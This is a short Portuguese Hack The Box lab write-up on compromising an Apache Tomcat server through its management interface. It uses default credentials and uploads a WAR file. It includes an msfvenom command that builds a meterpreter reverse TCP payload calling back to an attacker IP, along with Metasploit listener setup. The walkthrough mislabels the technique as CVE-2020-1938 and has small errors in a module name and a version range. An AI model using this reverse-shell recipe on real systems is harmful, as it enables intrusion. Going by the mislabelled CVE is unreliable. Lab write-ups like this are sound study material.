
Passo a passo para exploração do CVE-2020-1938 (Apache Tomcat upload arbitrário de JSP para RCE) usando msfvenom e Metasploit em um ambiente Hack The Box de laboratório.
CVE-2020-1938 é uma vulnerabilidade crítica que afeta o Apache Tomcat de 9.0.0.M1 a 9.0.0.30, 8.5.0 a 8.5.50 e 7.0.0 a 7.0.99 ⚠️ Isto foi explorado num laboratório Hack The Box.
🔗 Referência: Entrada NIST NVD
O site possui credenciais padrão para o recurso Server Status.
Esta interface indica que a versão é Apache Tomcat/7.0.88, arquitetura de 64 bits.
A partir desta interface, navegamos para listar aplicações que expõem um recurso de Upload de arquivos .war.
Após o upload bem-sucedido, o arquivo .war é executado em /directory/filename
A pesquisa sobre a versão do Apache Tomcat confirmou a vulnerabilidade ao CVE-2020-1938
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
Usando o msfvenom, que é um gerador de payloads do metasploit, geramos o nosso payload exploit.war.
Após a geração do arquivo, entre no arquivo e encontre o nome do arquivo .jsp, por exemplo, gcvxdtmxvw.jsp, e guarde-o para mais tarde.
msfconsole
use exploit/multi/hanlder
Set LHOST 10.10.14.3
Set LPORT 3004
Usando o msfconsole, configuramos um listener que aguarda a execução do nosso payload.


Fazemos upload da nossa imagem na seção de deploy, após o que atualizamos a tela e verificamos que o arquivo foi carregado com sucesso. Para concluir a exploração, devemos navegar até o caminho ip/hacked/gcvxdtmxvw.jsp.

Isso faz com que a requisição fique pendente, no entanto, conseguimos ver localmente na nossa máquina que temos uma conexão reversa.